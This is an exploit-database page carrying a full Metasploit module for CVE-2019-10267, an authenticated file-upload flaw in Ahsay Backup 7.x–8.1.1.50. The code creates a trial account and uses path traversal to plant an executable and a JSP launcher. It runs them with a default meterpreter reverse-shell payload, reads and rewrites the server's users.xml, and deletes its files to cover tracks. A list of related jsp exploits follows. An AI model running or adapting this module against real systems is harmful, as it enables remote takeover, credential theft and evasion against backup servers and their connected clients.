Menu

Search for hundreds of thousands of exploits

"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)"

Author

"Wietse Boonstra"

Platform

jsp

Release date

2019-07-26

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (Metasploit)
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x < 8.1.1.50 (REQUIRED)
# Tested on: Windows / Linux
# CVE : CVE-2019-10267
 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include REXML
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload',
      'Description' => %q{
       This module exploits an authenticated insecure file upload and code
       execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute
       the upload credentials are needed, default on Ahsay Backup trial
       accounts are enabled so an account can be created.
 
       It can be exploited in Windows and Linux environments to get remote code
       execution (usualy as SYSTEM). This module has been tested successfully
       on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this
       flaw all connected clients can be configured to execute a command before
       the backup starts. Allowing an attacker to takeover even more systems
       and make it rain shells!
 
       Setting the CREATEACCOUNT to true will create a new account, this is
       enabled by default.
       If credeantials are known enter these and run the exploit.
      },
      'Author'       =>
        [
          'Wietse Boonstra'
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2019-10267'],
          [ 'URL', 'https://www.wbsec.nl/ahsay/' ],
          [ 'URL', 'http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe' ]
        ],
      'Privileged'  => true,
      'Platform'    => 'win',
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL' => true,
        'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
      },
      'Targets'     =>
        [
          [  'Windows x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'Linux x86', # should work but untested
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            },
          ],
 
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 1 2019'))
 
    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
        OptString.new('USERNAME', [true, 'Username for the (new) account', Rex::Text.rand_text_alphanumeric(8)]),
        OptString.new('PASSWORD', [true, 'Password for the (new) account', Rex::Text.rand_text_alpha(8) + Rex::Text.rand_text_numeric(5) + Rex::Text.rand_char("","!$%^&*")]),
        OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
        OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),
 
      ])
  end
 
  def is_trial_enabled?
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
      'method' => 'POST',
      'data'   => ''
    })
    if res and res.code == 200 and "ENABLED" =~ /#{res.body}/
      return true
    else
      return false
    end
  end
 
  def check_account?
    headers = create_request_headers
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','getUserProfile'),
      'method' => 'POST',
      'data'   => '',
      'headers' => headers
    })
    if res and res.code == 200
      print_good("Username and password are valid!")
      return true
    elsif res and res.code == 500 and "USER_NOT_EXIST" =~ /#{res.body}/
      # fail_with(Failure::NoAccess, 'Username incorrect!')
      print_status("Username does not exist.")
      return false
    elsif res and res.code == 500 and "PASSWORD_INCORRECT" =~ /#{res.body}/
      # fail_with(Failure::NoAccess, 'Username exists but password incorrect!')
      print_status("Username exists but password incorrect!")
      return false
    else
      return false
    end
  end
 
  def create_request_headers
    headers = {}
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers['X-RSW-custom-encode-username'] = username
    headers['X-RSW-custom-encode-password'] = password
    headers
  end
 
  def exploit
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
 
    if is_trial_enabled? and datastore['CREATEACCOUNT'] == "true"
      if username == "" or password == ""
        fail_with(Failure::NoAccess, 'Please set a username and password')
      else
        #check if account does not exists?
        if !check_account?
          # Create account and check if it is valid
          if create_account?
            drop_and_execute()
          else
            fail_with(Failure::NoAccess, 'Failed to authenticate')
          end
        else
          #Need to fix, check if account exist
          print_good("No need to create account, already exists!")
          drop_and_execute()
        end
      end
    elsif username != "" and password != ""
      if check_account?
        drop_and_execute()
      else
        if is_trial_enabled?
          fail_with(Failure::NoAccess, 'Username and password are invalid. But server supports trial accounts, you can create an account!')
        end
        fail_with(Failure::NoAccess, 'Username and password are invalid')
      end
    else
      fail_with(Failure::UnexpectedReply, 'Missing some settings')
    end
  end
 
  def create_account?
    headers = create_request_headers
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','addTrialUser'),
      'method' => 'POST',
      'data'   => '',
      'headers' => headers
    })
    # print (res.body)
    if res and res.code == 200
      print_good("Account created")
      return true
    elsif res.body.include?('LOGIN_NAME_IS_USED')
      fail_with(Failure::NoAccess, 'Username is in use!')
    elsif res.body.include?('PWD_COMPLEXITY_FAILURE')
      fail_with(Failure::NoAccess, 'Password not complex enough')
    else
      fail_with(Failure::UnexpectedReply, 'Something went wrong!')
    end
  end
 
  def remove_account
    if datastore['CREATEACCOUNT']
      username = datastore['USERNAME']
      users_xml = "../../conf/users.xml"
      print_status("Looking for account #{username} in #{users_xml}")
      xml_doc = download(users_xml)
      xmldoc = Document.new(xml_doc)
      el = 0
      xmldoc.elements.each("Setting/Key") do |e|
          el = el + 1
          e.elements.each("Value") do |a|
              if a.attributes["name"].include?('name')
                  if a.attributes["data"].include?(username)
                      print_good("Found account")
                      xmldoc.root.elements.delete el
                      print_status("Removed account")
                  end
              end
          end
      end
      new_xml = xmldoc.root
      print_status("Uploading new #{users_xml} file")
      upload(users_xml, new_xml.to_s)
      print_good("Account is inaccesible when service restarts!")
    end
  end
 
  def prepare_path(path)
    if path.end_with? '/'
      path = path.chomp('/')
    end
    path
  end
 
  def drop_and_execute()
    path = prepare_path(datastore['UPLOADPATH'])
    exploitpath = path.gsub("../../webapps/cbs/",'')
    exploitpath = exploitpath.gsub("/","\\\\\\")
    requestpath = path.gsub("../../webapps/",'')
 
    #First stage payload creation and upload
    exe = payload.encoded_exe
    exe_filename = Rex::Text.rand_text_alpha(10)
    exefileLocation = "#{path}/#{exe_filename}.exe"
    print_status("Uploading first stage payload.")
    upload(exefileLocation, exe)
    #../../webapps/cbs/help/en
    exec = %Q{<% Runtime.getRuntime().exec(getServletContext().getRealPath("/") + "#{exploitpath}\\\\#{exe_filename}.exe");%>}
 
    #Second stage payload creation and upload
    jsp_filename = Rex::Text.rand_text_alpha(10)
    jspfileLocation = "#{path}/#{jsp_filename}.jsp"
    print_status("Uploading second stage payload.")
    upload(jspfileLocation, exec)
    proto = ssl ? 'https' : 'http'
    url = "#{proto}://#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")
 
    #Triggering the exploit
    print_status("Triggering exploit! #{url}" )
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp"),
      'method' => 'GET'
    })
    if res and res.code == 200
      print_good("Exploit executed!")
    end
 
    #Cleaning up
    print_status("Cleaning up after our selfs.")
    remove_account
    print_status("Trying to remove #{exefileLocation}, but will fail when in use.")
    delete(exefileLocation)
    delete(jspfileLocation)
    delete("../../user/#{datastore['USERNAME']}",true)
  end
 
  def upload(fileLocation, content)
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    uploadPath = Rex::Text.encode_base64(fileLocation)
 
    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    headers['X-RSW-custom-encode-path'] = uploadPath
    res = send_request_raw({
      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','upload'),
      'method' => 'PUT',
      'headers' => headers,
      'data' => content,
      'timeout' => 20
    })
    if res && res.code == 201
      print_good("Succesfully uploaded file to #{fileLocation}")
    else
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end
  end
 
  def download(fileLocation)
    #TODO make vars_get variable
    print_status("Downloading file")
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    res = send_request_cgi({
      #/obs/obm7/file/download?X-RSW-custom-encode-path=../../conf/users.xml
      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','download'),
      'method' => 'GET',
      'headers' => headers,
      'vars_get' => {
        'X-RSW-custom-encode-path' => fileLocation
      }
    })
 
    if res and res.code == 200
      res.body
    end
  end
 
  def delete(fileLocation, recursive=false)
    print_status("Deleting file #{fileLocation}")
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    res = send_request_cgi({
      #/obs/obm7/file/delete?X-RSW-custom-encode-path=../../user/xyz
      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','delete'),
      'method' => 'DELETE',
      'headers' => headers,
      'vars_get' => {
        'X-RSW-custom-encode-path' => fileLocation,
        'recursive' => recursive
      }
    })
 
    if res and res.code == 200
      res.body
    end
  end
 
  def check
    #We need a cookie first
    cookie_res = send_request_cgi({
      #/cbs/system/ShowDownload.do
      'uri' => normalize_uri(target_uri.path, 'cbs','system','ShowDownload.do'),
      'method' => 'GET'
    })
 
    if cookie_res and cookie_res.code == 200
      cookie = cookie_res.get_cookies.split()[0]
    else
      return Exploit::CheckCode::Unknown
    end
 
    if defined?(cookie)
      #request the page with all the clientside software links.
      headers = {}
      headers['Cookie'] = cookie
      link = send_request_cgi({
        #/cbs/system/ShowDownload.do
        'uri' => normalize_uri(target_uri.path, 'cbs','system','download','indexTab1.jsp'),
        'method' => 'GET',
        'headers' => headers
      })
 
      if link and link.code == 200
        link.body.each_line do |line|
          #looking for the link that contains obm-linux and ends with .sh
          if line.include? '<a href="/cbs/download/' and line.include? '.sh' and line.include? 'obm-linux'
            filename = line.split("<a")[1].split('"')[1].split("?")[0]
            filecontent = send_request_cgi({
              #/cbs/system/ShowDownload.do
              'uri' => normalize_uri(target_uri.path, filename),
              'method' => 'GET',
              'headers' => headers
            })
            if filecontent and filecontent.code == 200
              filecontent.body.each_line do |l|
                if l.include? 'VERSION="'
                  number = l.split("=")[1].split('"')[1]
                  if number.match /(\d+\.)?(\d+\.)?(\d+\.)?(\*|\d+)$/
                    if number <= '8.1.1.50' and not number < '7'
                      return Exploit::CheckCode::Appears
                    else
                      return Exploit::CheckCode::Safe
                    end
                  end
                end
              end
            else
              return Exploit::CheckCode::Unknown
            end
          end
        end
      else
        return Exploit::CheckCode::Unknown
      end
    else
      return Exploit::CheckCode::Unknown
    end
 
  end
end
Release Date Title Type Platform Author
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution" webapps jsp "Wietse Boonstra"
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
2019-02-19 "Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting" webapps jsp "Rafael Pedrero"
2019-02-18 "Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload" webapps jsp "Dao Duy Hung"
2018-10-30 "Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal" webapps jsp "Rafael Pedrero"
2018-04-16 "Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference" webapps jsp Frogy
2018-02-22 "Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities" webapps jsp "Core Security"
2017-10-09 "Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)" webapps jsp intx0x80
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-08-18 "Symantec Messaging Gateway 10.6.3-2 - Root Remote Command Execution" webapps jsp "Philip Pettersson"
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration" webapps jsp LiquidWorm
2017-08-01 "Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload" webapps jsp "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)" webapps jsp "James Fitts"
2017-07-19 "Oracle E-Business Suite 12.x - Server-Side Request Forgery" webapps jsp "Sarath Nair"
2017-04-25 "Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection" webapps jsp ERPScan
2017-03-27 "Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)" webapps jsp Sysdream
2017-05-24 "NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion" webapps jsp f3ci
2018-01-05 "Gespage 7.4.8 - SQL Injection" webapps jsp Sysdream
2017-03-10 "Kinsey Infor/Lawson / ESBUS - SQL Injection" webapps jsp "Michael Benich"
2017-02-23 "NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection" webapps jsp MrChaZ
2017-01-04 "Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting" webapps jsp "Jodson Santos"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47180/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47180/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47180/41560/ahsay-backup-7x-81150-authenticated-arbitrary-file-upload-remote-code-execution-metasploit/download/", "exploit_id": "47180", "exploit_description": "\"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)\"", "exploit_date": "2019-07-26", "exploit_author": "\"Wietse Boonstra\"", "exploit_type": "webapps", "exploit_platform": "jsp", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse